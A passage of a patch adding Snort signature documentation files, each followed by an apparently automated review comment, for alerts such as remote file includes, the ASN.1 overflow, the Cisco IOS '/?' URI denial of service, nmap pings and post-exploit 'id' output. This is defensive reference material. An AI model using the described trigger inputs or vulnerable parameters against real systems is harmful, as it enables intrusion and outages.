+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
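Review bot: the Detailed Information paragraph about validating "the credentials of a client host" and the Attack Scenarios paragraph about accessing "an authentication mechanism" do not describe a remote file include through "admin_template_path"; they are the same boilerplate used in the PHP Live Helper and Plume CMS entries in this patch. Replace them with the RFI case (attacker-controlled URL supplied in admin_template_path is included and executed by the server). Fix "ona" to "on a", add the blank lines before "--" after "Sid:", "Affected Systems:" and "Contributors:" for consistency, and fill the empty Additional References with the Indexu advisory.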
--- /dev/null
+++ b/doc/signatures/3002.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3002
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
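Review bot: this file has no "Attack Scenarios:" section between Affected Systems and Ease of Attack, unlike every other entry in the patch; add one consistent with Detailed Information (an attacker sends a specially crafted ASN.1-encoded authentication packet to a listening service on the target). "A buffer overflow condition in the Microsoft implementation of the ASN.1 Library." is a sentence fragment; "taget" -> "target", "excuted" -> "executed". The closing heading is "References:" where the other files use "Additional References:". The "Rule:" line has trailing whitespace.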
--- /dev/null
+++ b/doc/signatures/100000129.txt
@@ -0,0 +1,89 @@
+Rule: 
+
+--
+Sid: 
+100000129
+
+-- 
+Summary: 
+This event is generated when a malformed URL is sent to a Cisco IOS HTTP 
+Router, which may cause a denial of service.
+
+-- 
+
+Impact: 
+If a router running a vulnerable version of the IOS HTTP server receives this 
+request, it will fall into an infinite loop, causing a denial of service. The 
+router will restart after two minutes, when the system's watchdog timer 
+realizes that the router has become unresponsive.
+
+--
+Detailed Information:
+If a "?" character immediately follows a "/" character in a URI, vulnerable 
+versions of the Cisco IOS HTTP Router will fall into an infinite loop, causing 
+a denial of service. The router will restart after two minutes, when the 
+system's watchdog timer realizes that the router has become unresponsive.
+
+
+--
+Affected Systems:
+Cisco IOS 12.0 XJ
+Cisco IOS 12.0 XH
+Cisco IOS 12.0 XE
+Cisco IOS 12.0 XA
+Cisco IOS 12.0 W5
+Cisco IOS 12.0 T
+Cisco IOS 12.1 XP
+Cisco IOS 12.1 XL
+Cisco IOS 12.1 XJ
+Cisco IOS 12.1 XI
+Cisco IOS 12.1 XH
+Cisco IOS 12.1 XG
+Cisco IOS 12.1 XF
+Cisco IOS 12.1 XE
+Cisco IOS 12.1 XD
+Cisco IOS 12.1 XC
+Cisco IOS 12.1 XB
+Cisco IOS 12.1 XA
+Cisco IOS 12.1 T
+Cisco IOS 12.1 EC
+Cisco IOS 12.1 E
+Cisco IOS 12.1 DC
+Cisco IOS 12.1 DB
+Cisco IOS 12.1 DA
+Cisco IOS 12.1 AA
+Cisco IOS 12.1
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the vendor-supplied patch, available at Cisco.com. As a workaround, the 
+IOS HTTP server may be disabled by using the command "no ip http server".
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
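Review bot: Impact and Detailed Information repeat the same two sentences about the infinite loop and the two-minute watchdog restart; keep the mechanism in Detailed Information and reduce Impact to a one-line statement (denial of service; router reloads after about two minutes). Additional References is empty although Corrective Action points the reader to "the vendor-supplied patch, available at Cisco.com"; add the Cisco advisory URL for the "/?" URI defect so it can be found. The Affected Systems list names 12.1 mainline but only the 12.0 trains (XJ, XH, XE, XA, W5, T), so state whether 12.0 mainline is affected or omitted deliberately.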
--- /dev/null
+++ b/doc/signatures/100000598.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000598
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
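Review bot: the Detailed Information and Attack Scenarios paragraphs about client "credentials" and "an authentication mechanism" are the same boilerplate as the other Indexu entry (100000610) and the PHP Live Helper entry in this patch and do not describe a remote file include via "admin_template_path" in "inv_delete.php"; replace them with the RFI case, and consider merging the per-script Indexu entries since only the script name differs. Fix "ona" to "on a", add the missing blank lines before "--" after "Sid:", "Affected Systems:" and "Contributors:", and fill the empty Additional References with the Indexu advisory.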
--- /dev/null
+++ b/doc/signatures/100000748.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000748
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "rss.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "rss.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
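Review bot: the file opens with two blank lines before "Rule:", and its paragraphs are single unwrapped lines while the other signature files in this patch wrap at roughly 78 columns; reflow to match. The parameter name "_PX_config[manager_path]" contains brackets, so Detailed Information should say whether the rule also matches the URL-encoded form of the brackets; if it matches only the literal string, "False Negatives: None known." is not accurate and the encoded form should be listed there. The "credentials"/"authentication mechanism" boilerplate shared with the PHP Live Helper and Indexu entries does not describe a remote file include and should be replaced with the RFI case. Fix "ona" to "on a".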
--- /dev/null
+++ b/doc/signatures/2473.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2473
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
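Review bot: the Summary says the rule fires on access to the ADMIN$ share, but Detailed Information describes the drive-letter shares (%DRIVE_LETTER% + $) and Attack Scenarios talks about "files located on the C drive"; ADMIN$ is the share of the Windows system directory, so the body describes C$ rather than the share the rule names. Align the three sections. Corrective Action blocks only TCP 139, while the RPC DCOM entries in this same patch also list 445; SMB over TCP 445 reaches the same shares, so add it. Give the Microsoft KB 100517 link a title so readers know which article it is.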
--- /dev/null
+++ b/doc/signatures/2927.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+2927
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft implementation of the Network News Transport
+Protocol (NNTP) for Internet Information Server (IIS).
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+The Microsoft implementation of NNTP for IIS contains a programming
+error in the processing of user supplied input that may present an
+attacker with multiple opportunites to execute code of their choosing on
+an affected system.
+
+--
+Affected Systems:
+. Microsoft Windows NT Server 4.0 NNTP component
+. Microsoft Windows 2000 Server NNTP component
+. Microsoft Windows Server 2003 NNTP Component
+. Microsoft Windows Server 2003 64-Bit Edition NNTP Component
+
+--
+Attack Scenarios:
+An attacker must supply specially crafted input to a vulnerable system
+to cause the overflow to occur.
+
+--
+Ease of Attack:
+Moderate. Example code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CORE Technologies:
+http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
+
+--
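Review bot: Detailed Information only says "a programming error in the processing of user supplied input" with "multiple opportunites", yet Attack Scenarios refers to "the overflow"; name the defect (a buffer overflow in NNTP command handling) and the NNTP input that triggers it, otherwise the reader cannot tell what the rule matches. Fix "opportunites" to "opportunities". Affected Systems uses ". " bullets where the other files use a tab-indented list. Additional References cites only the CORE advisory; add the Microsoft bulletin that Corrective Action's "vendor supplied patches" refers to. "Rule:" has trailing whitespace.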
--- /dev/null
+++ b/doc/signatures/351.txt
@@ -0,0 +1,64 @@
+SID:
+351
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated 
+user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
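Review bot: this file puts "SID:" before "Rule:" and ends with a "References:" heading; every other entry in the patch starts with "Rule:" then "Sid:" and ends with "Additional References:", so reorder to match. "very log directory names" should read "very long directory names"; also "insufficent" -> "insufficient", "wich" -> "which", "susspect" -> "suspect", and "Possible execution of commands on the affected server as with elevated user privileges" has a stray "as". Affected Systems lists NcFTPD 2.3.5, but Detailed Information, Attack Scenarios and Corrective Action discuss only wu-ftpd; either explain why NcFTPD is included or drop it. The "Probably others as well..." line runs past the wrap width used elsewhere, and References is empty.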
--- /dev/null
+++ b/doc/signatures/1078.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1078
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
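Review bot: Summary, Detailed Information and Attack Scenarios in this entry are entirely generic ("Many known vulnerabilities exist", "the attack scenarios are legion") and never state what rule 1078 matches; an analyst reading this on an alert learns nothing that distinguishes it from the equally generic 1019 entry in this patch. Add the request pattern or component the rule inspects, and fill the empty Additional References accordingly.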
--- /dev/null
+++ b/doc/signatures/1314.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1314
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "young teen".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "young teen".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
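Review bot: "a webpage was visited the included the content" should read "a web page was visited that included the content". False Positives already notes that the Snort rule descriptions trigger this rule; since this file itself contains the matched string, fetching it over HTTP will fire SID 1314, which is worth saying plainly. There are seven blank lines between "Additional References:" and the closing "--"; trim to one. "Rule:" has trailing whitespace and "Sid:" is followed by a stray blank line before the number.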
--- /dev/null
+++ b/doc/signatures/469.txt
@@ -0,0 +1,84 @@
+--
+Rule:
+
+--
+Sid:
+469
+
+--
+Summary:
+This event is generated when an ICMP ping typically generated by nmap is detected.
+
+--
+Impact:
+This could indicate a full scan by nmap which is sometimes indicative of
+potentially malicious behavior.
+
+--
+Detailed Information:
+Nmap's ICMP ping, by default, sends zero data as part of the ping.
+Nmap typically pings the host via icmp if the user has root
+privileges, and uses a tcp-ping otherwise.  
+
+--
+Attack Scenarios:
+As part of an information gathering attempt, an attacker may use nmap
+to see what hosts are alive on a given network.  If nmap is used for
+portscanning as root, the icmp ping will occur by default unless the
+user specifies otherwise (via '-P0').
+
+--
+Ease of Attack:
+Trivial.  Nmap requires little or no skill to operate.
+
+--
+False Positives:
+Possible.  The only current identifying feature of nmap's ICMP ping is
+that the data size is 0.  It is entirely possible that other tools may
+send icmp pings with zero data.
+
+Kontiki delivery manager used on windows platforms to download
+multimedia files is known to produce ICMP pings that can cause this
+rule to generate many events.
+
+avast! antivirus update feature is reported to produce ICMP pings with
+zero data when connecting to the avast servers. This can occur every 40
+seconds if no reply is received by the client.
+
+The avast! client attempts to ping one of the following servers:
+
+URL: http://www.asw.cz/iavs4pro
+IP: 195.70.130.34
+
+URL: http://www.avast.com/iavs4pro
+IP: 66.98.166.72
+
+URL: http://www.iavs.net/iavs4pro
+IP: 207.44.156.15
+
+URL: http://www.iavs.cz/iavs4pro
+IP: 62.168.45.69
+
+--
+False Negatives:
+None currently.
+
+--
+Corrective Action:
+If you detect other suspicous traffic from this host (i.e., a
+portscan), follow standard procedure to assess what threat this may
+pose.  If you only detect the icmp ping, this may have simply been a
+'ping sweep' and may be ignored.
+
+--
+Contributors:
+warchild@spoofed.org
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+www.insecure.org
+
+
+--
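Review bot: the Attack Scenarios paragraph tells the reader to look for '-P0' as the switch that suppresses the ping; that flag was renamed '-Pn' in later Nmap releases (and '-P0' is only kept as a deprecated alias), so the text should mention '-Pn' or the reader will not find it in current documentation. The claim in Detailed Information that Nmap "pings the host via icmp if the user has root privileges, and uses a tcp-ping otherwise" is also dated: as root, Nmap's default host discovery combines an ICMP echo with TCP probes, so this rule only ever sees the ICMP component of a larger sweep, which is worth stating in False Negatives. "suspicous" in Corrective Action should be "suspicious". The hard-coded avast! server IPs in False Positives will go stale; consider keeping the URLs and dropping the addresses, or date-stamping them.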
--- /dev/null
+++ b/doc/signatures/3093.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3093
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
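Review bot: Additional References is empty for a vulnerability that has a vendor bulletin; the License Logging Service buffer overflow described here is MS05-010 (CVE-2005-0050), and the doc should cite it so an analyst can tie the event to the patch named in Corrective Action. In Affected Systems, "Microsoft Windows Server 2000" is not a product name; it should read "Microsoft Windows 2000 Server", and listing NT, 2000, 2003 in release order would be cleaner.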
--- /dev/null
+++ b/doc/signatures/100000408.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000408
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "AssoCIateD" application running on a webserver. Access to the file "cache_mngt.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "cache_mngt.php" script used by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
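Review bot: the third paragraph of Detailed Information and the whole of Attack Scenarios are pasted from the generic CGI authentication template and do not describe a remote file include: the attacker here does not "access an authentication mechanism and supply his/her own credentials", they pass a URL in "root_path" so the script includes and executes attacker-hosted PHP. Rewrite Attack Scenarios around that, and add to Corrective Action the PHP-side mitigations that actually stop RFI (disable allow_url_include/allow_url_fopen, do not rely on register_globals). Also "exploitation attempt has been attempted" in Summary is redundant ("an exploitation attempt has been made"), and "ona web server" is missing a space.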
--- /dev/null
+++ b/doc/signatures/1882.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid: 1882
+
+-- 
+
+Summary: 
+This event is generated by the use of a UNIX "id" command. This may be 
+indicative of post-compromise behavior where the attacker is checking 
+for super user privileges gained by a sucessful exploit against a 
+vulnerable system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained user access to the system.
+
+--
+Detailed Information:
+This event is generated when a UNIX "id" command is used to confirm the 
+user name of the currenly logged in user over an unencrypted connection. 
+This connection can either be a legitimate telnet connection or the 
+result of spawning a remote shell as a consequence of a successful 
+network exploit. 
+
+The string "uid=" is an output of an "id" command indicating that a 
+check is being made on the users current id.
+
+--
+
+Attack Scenarios: 
+A buffer overflow exploit against an FTP server results in "/bin/sh" 
+being executed. An automated script performing an attack, checks for the
+success of the exploit via an "id" command.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the 
+successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This rule will generate an event if a legitimate system administrator 
+executes the "id" command over an unencrypted connection to verify the 
+privilege level available to him.
+
+This rule may generate false positive events when some servers return 
+error messages that include uid and gid information. Qmail is one such 
+server application.
+
+This rule may also generate event by viewing the documentation on 
+snort.org.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then 
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Additional false positive information from Javier Fernandez-Sanguino
+
+-- 
+Additional References:
+
+--
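Review bot: the Summary says the event is generated "by the use of a UNIX id command", but Detailed Information (the "uid=" paragraph) shows the rule matches the command's output in the server-to-client direction, not the command itself; the Summary should say so, because that is exactly why the Qmail error messages and the snort.org documentation pages listed under False Positives trigger it. Typos: "sucessful" (Summary), "currenly" (Detailed Information), and "This rule may also generate event by viewing" should read "This rule may also generate an event when viewing".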
--- /dev/null
+++ b/doc/signatures/914.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+914
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
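Review bot: Detailed Information never says what SID 914 actually matches; "Many known vulnerabilities exist for this platform and the attack scenarios are legion" gives an analyst nothing to verify against the packet. Name the ColdFusion resource or URI the rule looks for and cite it under Additional References, which is empty. "Coldfusion" and "ColdFusion" are both used; pick the vendor spelling.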
--- /dev/null
+++ b/doc/signatures/588.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+588
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ttdbserverd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ttdbserverd is using.  Attackers can also learn what versions of the ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ttdbserverd run.  The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications used in Common Desktop Environment (CDE) to communicate.  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server comes enabled on hosts with CDE.  Multiple vulernabilities have been associated with the ToolTalk database server. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ttdbserverd runs.  This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not probes of the ttdbserverd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ttdbserverd service itself. An attacker may attempt to go directly to the ttdbserverd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
